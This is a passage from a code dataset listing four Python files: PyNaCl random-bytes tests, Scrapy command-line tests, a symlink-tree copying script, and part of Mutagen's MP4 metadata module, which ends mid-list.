ext | sha | content
---|---|---|
py | 1a303659262fe745e6841a0210726edee312644d | # Copyright 2013 Donald Stufft and individual contributors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, division, print_function
import nacl.utils
def test_random_bytes_produces():
assert len(nacl.utils.random(16)) == 16
def test_random_bytes_produces_different_bytes():
assert nacl.utils.random(16) != nacl.utils.random(16)
|
py | 1a30368ba432bca7020336b00c15858178716151 | import os
import sys
import subprocess
import tempfile
from time import sleep
from os.path import exists, join, abspath
from shutil import rmtree, copytree
from tempfile import mkdtemp
import six
from twisted.trial import unittest
from twisted.internet import defer
import scrapy
from scrapy.utils.python import to_native_str
from scrapy.utils.python import retry_on_eintr
from scrapy.utils.test import get_testenv
from scrapy.utils.testsite import SiteTest
from scrapy.utils.testproc import ProcessTest
class ProjectTest(unittest.TestCase):
project_name = 'testproject'
def setUp(self):
self.temp_path = mkdtemp()
self.cwd = self.temp_path
self.proj_path = join(self.temp_path, self.project_name)
self.proj_mod_path = join(self.proj_path, self.project_name)
self.env = get_testenv()
def tearDown(self):
rmtree(self.temp_path)
def call(self, *new_args, **kwargs):
with tempfile.TemporaryFile() as out:
args = (sys.executable, '-m', 'scrapy.cmdline') + new_args
return subprocess.call(args, stdout=out, stderr=out, cwd=self.cwd,
env=self.env, **kwargs)
def proc(self, *new_args, **kwargs):
args = (sys.executable, '-m', 'scrapy.cmdline') + new_args
p = subprocess.Popen(args, cwd=self.cwd, env=self.env,
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
**kwargs)
waited = 0
interval = 0.2
while p.poll() is None:
sleep(interval)
waited += interval
if waited > 15:
p.kill()
assert False, 'Command took too much time to complete'
return p
class StartprojectTest(ProjectTest):
def test_startproject(self):
self.assertEqual(0, self.call('startproject', self.project_name))
assert exists(join(self.proj_path, 'scrapy.cfg'))
assert exists(join(self.proj_path, 'testproject'))
assert exists(join(self.proj_mod_path, '__init__.py'))
assert exists(join(self.proj_mod_path, 'items.py'))
assert exists(join(self.proj_mod_path, 'pipelines.py'))
assert exists(join(self.proj_mod_path, 'settings.py'))
assert exists(join(self.proj_mod_path, 'spiders', '__init__.py'))
self.assertEqual(1, self.call('startproject', self.project_name))
self.assertEqual(1, self.call('startproject', 'wrong---project---name'))
self.assertEqual(1, self.call('startproject', 'sys'))
class StartprojectTemplatesTest(ProjectTest):
def setUp(self):
super(StartprojectTemplatesTest, self).setUp()
self.tmpl = join(self.temp_path, 'templates')
self.tmpl_proj = join(self.tmpl, 'project')
def test_startproject_template_override(self):
copytree(join(scrapy.__path__[0], 'templates'), self.tmpl)
with open(join(self.tmpl_proj, 'root_template'), 'w'):
pass
assert exists(join(self.tmpl_proj, 'root_template'))
args = ['--set', 'TEMPLATES_DIR=%s' % self.tmpl]
p = self.proc('startproject', self.project_name, *args)
out = to_native_str(retry_on_eintr(p.stdout.read))
self.assertIn("New Scrapy project %r, using template directory" % self.project_name, out)
self.assertIn(self.tmpl_proj, out)
assert exists(join(self.proj_path, 'root_template'))
class CommandTest(ProjectTest):
def setUp(self):
super(CommandTest, self).setUp()
self.call('startproject', self.project_name)
self.cwd = join(self.temp_path, self.project_name)
self.env['SCRAPY_SETTINGS_MODULE'] = '%s.settings' % self.project_name
class GenspiderCommandTest(CommandTest):
def test_arguments(self):
# only pass one argument. spider script shouldn't be created
self.assertEqual(2, self.call('genspider', 'test_name'))
assert not exists(join(self.proj_mod_path, 'spiders', 'test_name.py'))
# pass two arguments <name> <domain>. spider script should be created
self.assertEqual(0, self.call('genspider', 'test_name', 'test.com'))
assert exists(join(self.proj_mod_path, 'spiders', 'test_name.py'))
def test_template(self, tplname='crawl'):
args = ['--template=%s' % tplname] if tplname else []
spname = 'test_spider'
p = self.proc('genspider', spname, 'test.com', *args)
out = to_native_str(retry_on_eintr(p.stdout.read))
self.assertIn("Created spider %r using template %r in module" % (spname, tplname), out)
self.assertTrue(exists(join(self.proj_mod_path, 'spiders', 'test_spider.py')))
p = self.proc('genspider', spname, 'test.com', *args)
out = to_native_str(retry_on_eintr(p.stdout.read))
self.assertIn("Spider %r already exists in module" % spname, out)
def test_template_basic(self):
self.test_template('basic')
def test_template_csvfeed(self):
self.test_template('csvfeed')
def test_template_xmlfeed(self):
self.test_template('xmlfeed')
def test_list(self):
self.assertEqual(0, self.call('genspider', '--list'))
def test_dump(self):
self.assertEqual(0, self.call('genspider', '--dump=basic'))
self.assertEqual(0, self.call('genspider', '-d', 'basic'))
def test_same_name_as_project(self):
self.assertEqual(2, self.call('genspider', self.project_name))
assert not exists(join(self.proj_mod_path, 'spiders', '%s.py' % self.project_name))
class MiscCommandsTest(CommandTest):
def test_list(self):
self.assertEqual(0, self.call('list'))
class RunSpiderCommandTest(CommandTest):
def test_runspider(self):
tmpdir = self.mktemp()
os.mkdir(tmpdir)
fname = abspath(join(tmpdir, 'myspider.py'))
with open(fname, 'w') as f:
f.write("""
import scrapy
class MySpider(scrapy.Spider):
name = 'myspider'
def start_requests(self):
self.logger.debug("It Works!")
return []
""")
p = self.proc('runspider', fname)
log = to_native_str(p.stderr.read())
self.assertIn("DEBUG: It Works!", log)
self.assertIn("INFO: Spider opened", log)
self.assertIn("INFO: Closing spider (finished)", log)
self.assertIn("INFO: Spider closed (finished)", log)
def test_runspider_no_spider_found(self):
tmpdir = self.mktemp()
os.mkdir(tmpdir)
fname = abspath(join(tmpdir, 'myspider.py'))
with open(fname, 'w') as f:
f.write("""
from scrapy.spiders import Spider
""")
p = self.proc('runspider', fname)
log = to_native_str(p.stderr.read())
self.assertIn("No spider found in file", log)
def test_runspider_file_not_found(self):
p = self.proc('runspider', 'some_non_existent_file')
log = to_native_str(p.stderr.read())
self.assertIn("File not found: some_non_existent_file", log)
def test_runspider_unable_to_load(self):
tmpdir = self.mktemp()
os.mkdir(tmpdir)
fname = abspath(join(tmpdir, 'myspider.txt'))
with open(fname, 'w') as f:
f.write("")
p = self.proc('runspider', fname)
log = to_native_str(p.stderr.read())
self.assertIn("Unable to load", log)
class ParseCommandTest(ProcessTest, SiteTest, CommandTest):
command = 'parse'
def setUp(self):
super(ParseCommandTest, self).setUp()
self.spider_name = 'parse_spider'
fname = abspath(join(self.proj_mod_path, 'spiders', 'myspider.py'))
with open(fname, 'w') as f:
f.write("""
import scrapy
class MySpider(scrapy.Spider):
name = '{0}'
def parse(self, response):
if getattr(self, 'test_arg', None):
self.logger.debug('It Works!')
return [scrapy.Item(), dict(foo='bar')]
""".format(self.spider_name))
fname = abspath(join(self.proj_mod_path, 'pipelines.py'))
with open(fname, 'w') as f:
f.write("""
import logging
class MyPipeline(object):
component_name = 'my_pipeline'
def process_item(self, item, spider):
logging.info('It Works!')
return item
""")
fname = abspath(join(self.proj_mod_path, 'settings.py'))
with open(fname, 'a') as f:
f.write("""
ITEM_PIPELINES = {'%s.pipelines.MyPipeline': 1}
""" % self.project_name)
@defer.inlineCallbacks
def test_spider_arguments(self):
_, _, stderr = yield self.execute(['--spider', self.spider_name,
'-a', 'test_arg=1',
'-c', 'parse',
self.url('/html')])
self.assertIn("DEBUG: It Works!", to_native_str(stderr))
@defer.inlineCallbacks
def test_pipelines(self):
_, _, stderr = yield self.execute(['--spider', self.spider_name,
'--pipelines',
'-c', 'parse',
self.url('/html')])
self.assertIn("INFO: It Works!", to_native_str(stderr))
@defer.inlineCallbacks
def test_parse_items(self):
status, out, stderr = yield self.execute(
['--spider', self.spider_name, '-c', 'parse', self.url('/html')]
)
self.assertIn("""[{}, {'foo': 'bar'}]""", to_native_str(out))
class BenchCommandTest(CommandTest):
def test_run(self):
p = self.proc('bench', '-s', 'LOGSTATS_INTERVAL=0.001',
'-s', 'CLOSESPIDER_TIMEOUT=0.01')
log = to_native_str(p.stderr.read())
self.assertIn('INFO: Crawled', log)
self.assertNotIn('Unhandled Error', log)
|
py | 1a3036958a98967887dd32d7ac1c61f266b30daa | #! /usr/bin/env python3
# linktree
#
# Make a copy of a directory tree with symbolic links to all files in the
# original tree.
# All symbolic links go to a special symbolic link at the top, so you
# can easily fix things if the original source tree moves.
# See also "mkreal".
#
# usage: mklinks oldtree newtree
import sys, os
LINK = '.LINK' # Name of special symlink at the top.
debug = 0
def main():
if not 3 <= len(sys.argv) <= 4:
print('usage:', sys.argv[0], 'oldtree newtree [linkto]')
return 2
oldtree, newtree = sys.argv[1], sys.argv[2]
if len(sys.argv) > 3:
link = sys.argv[3]
link_may_fail = 1
else:
link = LINK
link_may_fail = 0
if not os.path.isdir(oldtree):
print(oldtree + ': not a directory')
return 1
try:
os.mkdir(newtree, 0o777)
except OSError as msg:
print(newtree + ': cannot mkdir:', msg)
return 1
linkname = os.path.join(newtree, link)
try:
os.symlink(os.path.join(os.pardir, oldtree), linkname)
except OSError as msg:
if not link_may_fail:
print(linkname + ': cannot symlink:', msg)
return 1
else:
print(linkname + ': warning: cannot symlink:', msg)
linknames(oldtree, newtree, link)
return 0
def linknames(old, new, link):
if debug: print('linknames', (old, new, link))
try:
names = os.listdir(old)
except OSError as msg:
print(old + ': warning: cannot listdir:', msg)
return
for name in names:
if name not in (os.curdir, os.pardir):
oldname = os.path.join(old, name)
linkname = os.path.join(link, name)
newname = os.path.join(new, name)
if debug > 1: print(oldname, newname, linkname)
if os.path.isdir(oldname) and \
not os.path.islink(oldname):
try:
os.mkdir(newname, 0o777)
ok = 1
except OSError as msg:
print(newname + \
': warning: cannot mkdir:', msg)
ok = 0
if ok:
linkname = os.path.join(os.pardir,
linkname)
linknames(oldname, newname, linkname)
else:
os.symlink(linkname, newname)
if __name__ == '__main__':
sys.exit(main())
|
py | 1a30372249f51bead4c5c0d4d412fe2f179192bb | # -*- coding: utf-8 -*-
# Copyright (C) 2006 Joe Wreschnig
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
"""Read and write MPEG-4 audio files with iTunes metadata.
This module will read MPEG-4 audio information and metadata,
as found in Apple's MP4 (aka M4A, M4B, M4P) files.
There is no official specification for this format. The source code
for TagLib, FAAD, and various MPEG specifications at
* http://developer.apple.com/documentation/QuickTime/QTFF/
* http://www.geocities.com/xhelmboyx/quicktime/formats/mp4-layout.txt
* http://standards.iso.org/ittf/PubliclyAvailableStandards/\
c041828_ISO_IEC_14496-12_2005(E).zip
* http://wiki.multimedia.cx/index.php?title=Apple_QuickTime
were all consulted.
"""
import struct
import sys
from mutagen import FileType, Metadata, StreamInfo
from mutagen._constants import GENRES
from mutagen._util import (cdata, insert_bytes, DictProxy, MutagenError,
hashable, enum)
from mutagen._compat import (reraise, PY2, string_types, text_type, chr_,
iteritems, PY3, cBytesIO)
from ._atom import Atoms, Atom, AtomError
from ._util import parse_full_atom
from ._as_entry import AudioSampleEntry, ASEntryError
class error(IOError, MutagenError):
pass
class MP4MetadataError(error):
pass
class MP4StreamInfoError(error):
pass
class MP4MetadataValueError(ValueError, MP4MetadataError):
pass
__all__ = ['MP4', 'Open', 'delete', 'MP4Cover', 'MP4FreeForm', 'AtomDataType','MediaKind', 'HDVideo', 'ContentRating']
@enum
class AtomDataType(object):
"""Enum for `dataformat` attribute of MP4FreeForm.
.. versionadded:: 1.25
"""
IMPLICIT = 0
"""for use with tags for which no type needs to be indicated because
only one type is allowed"""
UTF8 = 1
"""without any count or null terminator"""
UTF16 = 2
"""also known as UTF-16BE"""
SJIS = 3
"""deprecated unless it is needed for special Japanese characters"""
HTML = 6
"""the HTML file header specifies which HTML version"""
XML = 7
"""the XML header must identify the DTD or schemas"""
UUID = 8
"""also known as GUID; stored as 16 bytes in binary (valid as an ID)"""
ISRC = 9
"""stored as UTF-8 text (valid as an ID)"""
MI3P = 10
"""stored as UTF-8 text (valid as an ID)"""
GIF = 12
"""(deprecated) a GIF image"""
JPEG = 13
"""a JPEG image"""
PNG = 14
"""PNG image"""
URL = 15
"""absolute, in UTF-8 characters"""
DURATION = 16
"""in milliseconds, 32-bit integer"""
DATETIME = 17
"""in UTC, counting seconds since midnight, January 1, 1904;
32 or 64-bits"""
GENRES = 18
"""a list of enumerated values"""
INTEGER = 21
"""a signed big-endian integer with length one of { 1,2,3,4,8 } bytes"""
RIAA_PA = 24
"""RIAA parental advisory; { -1=no, 1=yes, 0=unspecified },
8-bit integer"""
UPC = 25
"""Universal Product Code, in text UTF-8 format (valid as an ID)"""
BMP = 27
"""Windows bitmap image"""
@hashable
class MP4Cover(bytes):
"""A cover artwork.
Attributes:
* imageformat -- format of the image (either FORMAT_JPEG or FORMAT_PNG)
"""
FORMAT_JPEG = AtomDataType.JPEG
FORMAT_PNG = AtomDataType.PNG
def __new__(cls, data, *args, **kwargs):
return bytes.__new__(cls, data)
def __init__(self, data, imageformat=FORMAT_JPEG):
self.imageformat = imageformat
__hash__ = bytes.__hash__
def __eq__(self, other):
if not isinstance(other, MP4Cover):
return NotImplemented
if not bytes.__eq__(self, other):
return False
if self.imageformat != other.imageformat:
return False
return True
def __ne__(self, other):
return not self.__eq__(other)
def __repr__(self):
return "%s(%r, %r)" % (
type(self).__name__, bytes(self),
AtomDataType(self.imageformat))
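# Illustrative sketch of attaching cover art with the class above (the image
# bytes and the tags object are assumptions):
#
#     cover = MP4Cover(png_bytes, imageformat=MP4Cover.FORMAT_PNG)
#     tags["covr"] = [cover]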
@hashable
class MP4FreeForm(bytes):
"""A freeform value.
Attributes:
* dataformat -- format of the data (see AtomDataType)
"""
FORMAT_DATA = AtomDataType.IMPLICIT # deprecated
FORMAT_TEXT = AtomDataType.UTF8 # deprecated
def __new__(cls, data, *args, **kwargs):
return bytes.__new__(cls, data)
def __init__(self, data, dataformat=AtomDataType.UTF8, version=0):
self.dataformat = dataformat
self.version = version
__hash__ = bytes.__hash__
def __eq__(self, other):
if not isinstance(other, MP4FreeForm):
return NotImplemented
if not bytes.__eq__(self, other):
return False
if self.dataformat != other.dataformat:
return False
if self.version != other.version:
return False
return True
def __ne__(self, other):
return not self.__eq__(other)
def __repr__(self):
return "%s(%r, %r)" % (
type(self).__name__, bytes(self),
AtomDataType(self.dataformat))
def _name2key(name):
if PY2:
return name
return name.decode("latin-1")
def _key2name(key):
if PY2:
return key
return key.encode("latin-1")
class MP4Tags(DictProxy, Metadata):
r"""Dictionary containing Apple iTunes metadata list key/values.
Keys are four byte identifiers, except for freeform ('----')
keys. Values are usually unicode strings, but some atoms have a
special structure:
Text values (multiple values per key are supported):
* '\\xa9nam' -- track title
* '\\xa9alb' -- album
* '\\xa9ART' -- artist
* 'aART' -- album artist
* '\\xa9wrt' -- composer
* '\\xa9day' -- year
* '\\xa9cmt' -- comment
* 'desc' -- description (usually used in podcasts)
* 'purd' -- purchase date
* '\\xa9grp' -- grouping
* '\\xa9gen' -- genre
* '\\xa9lyr' -- lyrics
* 'purl' -- podcast URL
* 'egid' -- podcast episode GUID
* 'catg' -- podcast category
* 'keyw' -- podcast keywords
* '\\xa9too' -- encoded by
* 'cprt' -- copyright
* 'soal' -- album sort order
* 'soaa' -- album artist sort order
* 'soar' -- artist sort order
* 'sonm' -- title sort order
* 'soco' -- composer sort order
* 'sosn' -- show sort order
* 'tvsh' -- show name
Boolean values:
* 'cpil' -- part of a compilation
* 'pgap' -- part of a gapless album
* 'pcst' -- podcast (iTunes reads this only on import)
Tuples of ints (multiple values per key are supported):
* 'trkn' -- track number, total tracks
* 'disk' -- disc number, total discs
Others:
* 'tmpo' -- tempo/BPM, 16 bit int
* 'covr' -- cover artwork, list of MP4Cover objects (which are
tagged strs)
* 'gnre' -- ID3v1 genre. Not supported, use '\\xa9gen' instead.
The freeform '----' frames use a key in the format '----:mean:name'
where 'mean' is usually 'com.apple.iTunes' and 'name' is a unique
identifier for this frame. The value is a str, but is probably
text that can be decoded as UTF-8. Multiple values per key are
supported.
MP4 tag data cannot exist outside of the structure of an MP4 file,
so this class should not be manually instantiated.
Unknown non-text tags and tags that failed to parse will be written
back as is.
"""
def __init__(self, *args, **kwargs):
self._failed_atoms = {}
super(MP4Tags, self).__init__(*args, **kwargs)
def load(self, atoms, fileobj):
try:
ilst = atoms[b"moov.udta.meta.ilst"]
except KeyError as key:
raise MP4MetadataError(key)
for atom in ilst.children:
ok, data = atom.read(fileobj)
if not ok:
raise MP4MetadataError("Not enough data")
try:
if atom.name in self.__atoms:
info = self.__atoms[atom.name]
info[0](self, atom, data)
else:
# unknown atom, try as text
self.__parse_text(atom, data, implicit=False)
except MP4MetadataError:
# parsing failed, save them so we can write them back
key = _name2key(atom.name)
self._failed_atoms.setdefault(key, []).append(data)
def __setitem__(self, key, value):
if not isinstance(key, str):
raise TypeError("key has to be str")
super(MP4Tags, self).__setitem__(key, value)
@classmethod
def _can_load(cls, atoms):
return b"moov.udta.meta.ilst" in atoms
@staticmethod
def _key_sort(item):
(key, v) = item
# iTunes always writes the tags in order of "relevance", try
# to copy it as closely as possible.
order = ["\xa9nam", "\xa9ART", "\xa9wrt", "\xa9alb",
"\xa9gen", "gnre", "trkn", "disk",
"\xa9day", "cpil", "pgap", "pcst", "tmpo",
"\xa9too", "----", "covr", "\xa9lyr", "stik",
"tvsh", "tven", "tvsn", "tves", "tvnn"]
order = dict(zip(order, range(len(order))))
last = len(order)
# If there's no key-based way to distinguish, order by length.
# If there's still no way, go by string comparison on the
# values, so we at least have something deterministic.
return (order.get(key[:4], last), len(repr(v)), repr(v))
def save(self, filename):
"""Save the metadata to the given filename."""
values = []
items = sorted(self.items(), key=self._key_sort)
for key, value in items:
atom_name = _key2name(key)[:4]
if atom_name in self.__atoms:
render_func = self.__atoms[atom_name][1]
else:
render_func = type(self).__render_text
try:
if value:
values.append(render_func(self, key, value))
except (TypeError, ValueError) as s:
reraise(MP4MetadataValueError, s, sys.exc_info()[2])
for key, failed in iteritems(self._failed_atoms):
# don't write atoms back if we have added a new one with
# the same name, this excludes freeform which can have
# multiple atoms with the same key (most parsers seem to be able
# to handle that)
if key in self:
assert _key2name(key) != b"----"
continue
for data in failed:
values.append(Atom.render(_key2name(key), data))
data = Atom.render(b"ilst", b"".join(values))
# Find the old atoms.
with open(filename, "rb+") as fileobj:
try:
atoms = Atoms(fileobj)
except AtomError as err:
reraise(error, err, sys.exc_info()[2])
try:
path = atoms.path(b"moov", b"udta", b"meta", b"ilst")
except KeyError:
self.__save_new(fileobj, atoms, data)
else:
self.__save_existing(fileobj, atoms, path, data)
def __pad_ilst(self, data, length=None):
if length is None:
length = ((len(data) + 1023) & ~1023) - len(data)
return Atom.render(b"free", b"\x00" * length)
def __save_new(self, fileobj, atoms, ilst):
hdlr = Atom.render(b"hdlr", b"\x00" * 8 + b"mdirappl" + b"\x00" * 9)
meta = Atom.render(
b"meta", b"\x00\x00\x00\x00" + hdlr + ilst + self.__pad_ilst(ilst))
try:
path = atoms.path(b"moov", b"udta")
except KeyError:
# moov.udta not found -- create one
path = atoms.path(b"moov")
meta = Atom.render(b"udta", meta)
offset = path[-1].offset + 8
insert_bytes(fileobj, len(meta), offset)
fileobj.seek(offset)
fileobj.write(meta)
self.__update_parents(fileobj, path, len(meta))
self.__update_offsets(fileobj, atoms, len(meta), offset)
def __save_existing(self, fileobj, atoms, path, data):
# Replace the old ilst atom.
ilst = path.pop()
offset = ilst.offset
length = ilst.length
# Check for padding "free" atoms
meta = path[-1]
index = meta.children.index(ilst)
try:
prev = meta.children[index - 1]
if prev.name == b"free":
offset = prev.offset
length += prev.length
except IndexError:
pass
try:
next = meta.children[index + 1]
if next.name == b"free":
length += next.length
except IndexError:
pass
delta = len(data) - length
if delta > 0 or (delta < 0 and delta > -8):
data += self.__pad_ilst(data)
delta = len(data) - length
insert_bytes(fileobj, delta, offset)
elif delta < 0:
data += self.__pad_ilst(data, -delta - 8)
delta = 0
fileobj.seek(offset)
fileobj.write(data)
self.__update_parents(fileobj, path, delta)
self.__update_offsets(fileobj, atoms, delta, offset)
def __update_parents(self, fileobj, path, delta):
"""Update all parent atoms with the new size."""
for atom in path:
fileobj.seek(atom.offset)
size = cdata.uint_be(fileobj.read(4))
if size == 1: # 64bit
# skip name (4B) and read size (8B)
size = cdata.ulonglong_be(fileobj.read(12)[4:])
fileobj.seek(atom.offset + 8)
fileobj.write(cdata.to_ulonglong_be(size + delta))
else: # 32bit
fileobj.seek(atom.offset)
fileobj.write(cdata.to_uint_be(size + delta))
def __update_offset_table(self, fileobj, fmt, atom, delta, offset):
"""Update offset table in the specified atom."""
if atom.offset > offset:
atom.offset += delta
fileobj.seek(atom.offset + 12)
data = fileobj.read(atom.length - 12)
fmt = fmt % cdata.uint_be(data[:4])
offsets = struct.unpack(fmt, data[4:])
offsets = [o + (0, delta)[offset < o] for o in offsets]
fileobj.seek(atom.offset + 16)
fileobj.write(struct.pack(fmt, *offsets))
def __update_tfhd(self, fileobj, atom, delta, offset):
if atom.offset > offset:
atom.offset += delta
fileobj.seek(atom.offset + 9)
data = fileobj.read(atom.length - 9)
flags = cdata.uint_be(b"\x00" + data[:3])
if flags & 1:
o = cdata.ulonglong_be(data[7:15])
if o > offset:
o += delta
fileobj.seek(atom.offset + 16)
fileobj.write(cdata.to_ulonglong_be(o))
def __update_offsets(self, fileobj, atoms, delta, offset):
"""Update offset tables in all 'stco' and 'co64' atoms."""
if delta == 0:
return
moov = atoms[b"moov"]
for atom in moov.findall(b'stco', True):
self.__update_offset_table(fileobj, ">%dI", atom, delta, offset)
for atom in moov.findall(b'co64', True):
self.__update_offset_table(fileobj, ">%dQ", atom, delta, offset)
try:
for atom in atoms[b"moof"].findall(b'tfhd', True):
self.__update_tfhd(fileobj, atom, delta, offset)
except KeyError:
pass
def __parse_data(self, atom, data):
pos = 0
while pos < atom.length - 8:
head = data[pos:pos + 12]
if len(head) != 12:
raise MP4MetadataError("truncated atom % r" % atom.name)
length, name = struct.unpack(">I4s", head[:8])
version = ord(head[8:9])
flags = struct.unpack(">I", b"\x00" + head[9:12])[0]
if name != b"data":
raise MP4MetadataError(
"unexpected atom %r inside %r" % (name, atom.name))
chunk = data[pos + 16:pos + length]
if len(chunk) != length - 16:
raise MP4MetadataError("truncated atom % r" % atom.name)
yield version, flags, chunk
pos += length
def __add(self, key, value, single=False):
assert isinstance(key, str)
if single:
self[key] = value
else:
self.setdefault(key, []).extend(value)
def __render_data(self, key, version, flags, value):
return Atom.render(_key2name(key), b"".join([
Atom.render(
b"data", struct.pack(">2I", version << 24 | flags, 0) + data)
for data in value]))
def __parse_freeform(self, atom, data):
length = cdata.uint_be(data[:4])
mean = data[12:length]
pos = length
length = cdata.uint_be(data[pos:pos + 4])
name = data[pos + 12:pos + length]
pos += length
value = []
while pos < atom.length - 8:
length, atom_name = struct.unpack(">I4s", data[pos:pos + 8])
if atom_name != b"data":
raise MP4MetadataError(
"unexpected atom %r inside %r" % (atom_name, atom.name))
version = ord(data[pos + 8:pos + 8 + 1])
flags = struct.unpack(">I", b"\x00" + data[pos + 9:pos + 12])[0]
value.append(MP4FreeForm(data[pos + 16:pos + length],
dataformat=flags, version=version))
pos += length
key = _name2key(atom.name + b":" + mean + b":" + name)
self.__add(key, value)
def __render_freeform(self, key, value):
if isinstance(value, bytes):
value = [value]
dummy, mean, name = _key2name(key).split(b":", 2)
mean = struct.pack(">I4sI", len(mean) + 12, b"mean", 0) + mean
name = struct.pack(">I4sI", len(name) + 12, b"name", 0) + name
data = b""
for v in value:
flags = AtomDataType.UTF8
version = 0
if isinstance(v, MP4FreeForm):
flags = v.dataformat
version = v.version
data += struct.pack(
">I4s2I", len(v) + 16, b"data", version << 24 | flags, 0)
data += v.encode('UTF-8')
return Atom.render(b"----", mean + name + data)
def __parse_pair(self, atom, data):
key = _name2key(atom.name)
values = [struct.unpack(">2H", d[2:6]) for
version, flags, d in self.__parse_data(atom, data)]
self.__add(key, values)
def __render_pair(self, key, value):
data = []
for (track, total) in value:
if 0 <= track < 1 << 16 and 0 <= total < 1 << 16:
data.append(struct.pack(">4H", 0, track, total, 0))
else:
raise MP4MetadataValueError(
"invalid numeric pair %r" % ((track, total),))
return self.__render_data(key, 0, AtomDataType.IMPLICIT, data)
def __render_pair_no_trailing(self, key, value):
data = []
for (track, total) in value:
if 0 <= track < 1 << 16 and 0 <= total < 1 << 16:
data.append(struct.pack(">3H", 0, track, total))
else:
raise MP4MetadataValueError(
"invalid numeric pair %r" % ((track, total),))
return self.__render_data(key, 0, AtomDataType.IMPLICIT, data)
def __parse_genre(self, atom, data):
values = []
for version, flags, data in self.__parse_data(atom, data):
# version = 0, flags = 0
if len(data) != 2:
raise MP4MetadataValueError("invalid genre")
genre = cdata.short_be(data)
# Translate to a freeform genre.
try:
genre = GENRES[genre - 1]
except IndexError:
# this will make us write it back at least
raise MP4MetadataValueError("unknown genre")
values.append(genre)
key = _name2key(b"\xa9gen")
self.__add(key, values)
def __parse_tempo(self, atom, data):
values = []
for version, flags, data in self.__parse_data(atom, data):
# version = 0, flags = 0 or 21
if len(data) != 2:
raise MP4MetadataValueError("invalid tempo")
values.append(cdata.ushort_be(data))
key = _name2key(atom.name)
self.__add(key, values)
def __render_tempo(self, key, value):
try:
if len(value) == 0:
return self.__render_data(key, 0, AtomDataType.INTEGER, b"")
if (min(value) < 0) or (max(value) >= 2 ** 16):
raise MP4MetadataValueError(
"invalid 16 bit integers: %r" % value)
except TypeError:
raise MP4MetadataValueError(
"tmpo must be a list of 16 bit integers")
values = [cdata.to_ushort_be(v) for v in value]
return self.__render_data(key, 0, AtomDataType.INTEGER, values)
def __parse_bool(self, atom, data):
for version, flags, data in self.__parse_data(atom, data):
if len(data) != 1:
raise MP4MetadataValueError("invalid bool")
value = bool(ord(data))
key = _name2key(atom.name)
self.__add(key, value, single=True)
def __render_bool(self, key, value):
return self.__render_data(
key, 0, AtomDataType.INTEGER, [chr_(bool(value))])
def __parse_cover(self, atom, data):
values = []
pos = 0
while pos < atom.length - 8:
length, name, imageformat = struct.unpack(">I4sI",
data[pos:pos + 12])
if name != b"data":
if name == b"name":
pos += length
continue
raise MP4MetadataError(
"unexpected atom %r inside 'covr'" % name)
if imageformat not in (MP4Cover.FORMAT_JPEG, MP4Cover.FORMAT_PNG):
# Sometimes AtomDataType.IMPLICIT or simply wrong.
# In all cases it was jpeg, so default to it
imageformat = MP4Cover.FORMAT_JPEG
cover = MP4Cover(data[pos + 16:pos + length], imageformat)
values.append(cover)
pos += length
key = _name2key(atom.name)
self.__add(key, values)
def __render_cover(self, key, value):
atom_data = []
for cover in value:
try:
imageformat = cover.imageformat
except AttributeError:
imageformat = MP4Cover.FORMAT_JPEG
atom_data.append(Atom.render(
b"data", struct.pack(">2I", imageformat, 0) + cover))
return Atom.render(_key2name(key), b"".join(atom_data))
def __parse_text(self, atom, data, implicit=True):
# implicit = False, for parsing unknown atoms only take utf8 ones.
# For known ones we can assume the implicit are utf8 too.
values = []
for version, flags, atom_data in self.__parse_data(atom, data):
if implicit:
if flags not in (AtomDataType.IMPLICIT, AtomDataType.UTF8):
raise MP4MetadataError(
"Unknown atom type %r for %r" % (flags, atom.name))
else:
if flags != AtomDataType.UTF8:
raise MP4MetadataError(
"%r is not text, ignore" % atom.name)
try:
text = atom_data.decode("utf-8")
except UnicodeDecodeError as e:
raise MP4MetadataError("%s: %s" % (_name2key(atom.name), e))
values.append(text)
key = _name2key(atom.name)
self.__add(key, values)
def __render_text(self, key, value, flags=AtomDataType.UTF8):
if isinstance(value, string_types):
value = [value]
encoded = []
for v in value:
if not isinstance(v, text_type):
if PY3:
raise TypeError("%r not str" % v)
v = v.decode("utf-8")
encoded.append(v.encode("utf-8"))
return self.__render_data(key, 0, flags, encoded)
def __render_8int(self, key, value):
try:
if len(value) == 0:
return self.__render_data(key, 0, 0x07, b"")
if min(value) < 0 or max(value) >= 2 ** 8:
raise MP4MetadataValueError(
"invalid 8 bit integers: %r" % value)
except TypeError:
raise MP4MetadataValueError(
"%s must be a list of 8 bit integers" % (key))
values = list(map(cdata.to_uchar_be, value))
return self.__render_data(key, 0, 0x07, values)
def __render_32int(self, key, value):
try:
if len(value) == 0:
return self.__render_data(key, 0, 0x31, b"")
if min(value) < 0 or max(value) >= 2 ** 32:
raise MP4MetadataValueError(
"invalid 32 bit integers: %r" % value)
except TypeError:
raise MP4MetadataValueError(
"%s must be a list of 32 bit integers" % (key))
values = list(map(cdata.to_uint_be, value))
return self.__render_data(key, 0, 0x31, values)
def delete(self, filename):
"""Remove the metadata from the given filename."""
self._failed_atoms.clear()
self.clear()
self.save(filename)
__atoms = {
b"----": (__parse_freeform, __render_freeform),
b"trkn": (__parse_pair, __render_pair),
b"disk": (__parse_pair, __render_pair_no_trailing),
b"gnre": (__parse_genre, None),
b"tmpo": (__parse_tempo, __render_tempo),
b"cpil": (__parse_bool, __render_bool),
b"pgap": (__parse_bool, __render_bool),
b"pcst": (__parse_bool, __render_bool),
b"covr": (__parse_cover, __render_cover),
b"purl": (__parse_text, __render_text),
b"egid": (__parse_text, __render_text),
b"hdvd": (__parse_text, __render_8int),
b"tves": (__parse_text, __render_32int),
b"tvsn": (__parse_text, __render_32int),
b"stik": (__parse_text, __render_8int),
b"rtng": (__parse_text, __render_8int),
}
# these allow implicit flags and parse as text
for name in [b"\xa9nam", b"\xa9alb", b"\xa9ART", b"aART", b"\xa9wrt",
b"\xa9day", b"\xa9cmt", b"desc", b"purd", b"\xa9grp",
b"\xa9gen", b"\xa9lyr", b"catg", b"keyw", b"\xa9too",
b"cprt", b"soal", b"soaa", b"soar", b"sonm", b"soco",
